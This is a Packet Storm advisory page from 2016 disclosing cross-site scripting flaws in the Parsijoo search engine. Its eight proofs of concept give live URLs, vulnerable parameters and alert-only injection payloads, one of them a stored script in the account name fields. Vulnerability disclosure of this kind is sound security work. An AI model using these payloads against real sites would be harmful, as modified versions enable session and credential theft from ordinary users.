exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Parsijoo Cross Site Scripting

Parsijoo Cross Site Scripting
Posted Jun 26, 2016
Authored by bl4ck_MohajeM

Parsijoo Search Engine suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 0aff94920da9819f0b10ac4ae23aca660ccbdef403bc6bf45ae550e11c5f8769

Parsijoo Cross Site Scripting

Change Mirror Download
================================================================================
Cross Site Scripting on Search Engine Parsijoo
================================================================================
# # Author: bl4ck_mohajem (mohajem.war@gmail.com)

# #home page : http://www.parsijoo.ir/



# Description:
Parsijoo as a Persian search engine attempts to search for Persian
resources within the network.

# PoC 1 :
# URL: http://parsijoo.ir/web
# Vulnerable Parameter : q
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem ")'>
# ==> http://parsijoo.ir/web?q="><img src=x onerror='alert("Found By
bl4ck_mohajem ")'>


# PoC 2 :
# URL: http://image.parsijoo.ir/image
# Vulnerable Parameter : q
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem ")'>
# ==> http://image.parsijoo.ir/image?q="><img src=x
onerror='alert("Found By bl4ck_mohajem ")'>


# PoC 3 :
# URL: http://video.parsijoo.ir/video
# Vulnerable Parameter : q
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem ")'>
# ==> http://video.parsijoo.ir/video?q="><img src=x
onerror='alert("Found By bl4ck_mohajem ")'>


# PoC 4 :
# URL: http://ava.parsijoo.ir/ava
# Vulnerable Parameter : q
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem ")'>
# ==> http://ava.parsijoo.ir/ava?q="><img src=x onerror='alert("Found
By bl4ck_mohajem ")'>


# PoC 5 :
# URL: http://parsijoo.ir/download
# Vulnerable Parameter : q
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem ")'>
# ==> http://parsijoo.ir/download?q="><img src=x onerror='alert("Found
By bl4ck_mohajem ")'>


# PoC 6 :
# URL: http://parsijoo.ir/bazaar
# Vulnerable Parameter : q
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem ")'>
# ==> http://parsijoo.ir/bazaar?q=><img src=x onerror='alert("Found By
bl4ck_mohajem ")'>


# PoC 7 :
# URL: http://parsijoo.ir/feedback
# Vulnerable Parameter : src
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem ")'>
# ==> http://parsijoo.ir/feedback?src="><img src=x
onerror='alert("Found By bl4ck_mohajem ")'>


# PoC 8 :
A registered user can exploit this issue in combination with social engineering.
# URL : https://accounts.parsijoo.ir/account
# Vulnerable Parameter (POST) : form:name , form:lastname
# Payload : "><script>alert('Found By bl4ck_mohajem ')</script>
Now can see alert in first page.


########################################################
#tnx: Milad Hacking - arf1372 - shabgard - ehsan hosseini - The
Nonexistent - n1arash- B3HZ4D - AMo hassan
#
#######################################################
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close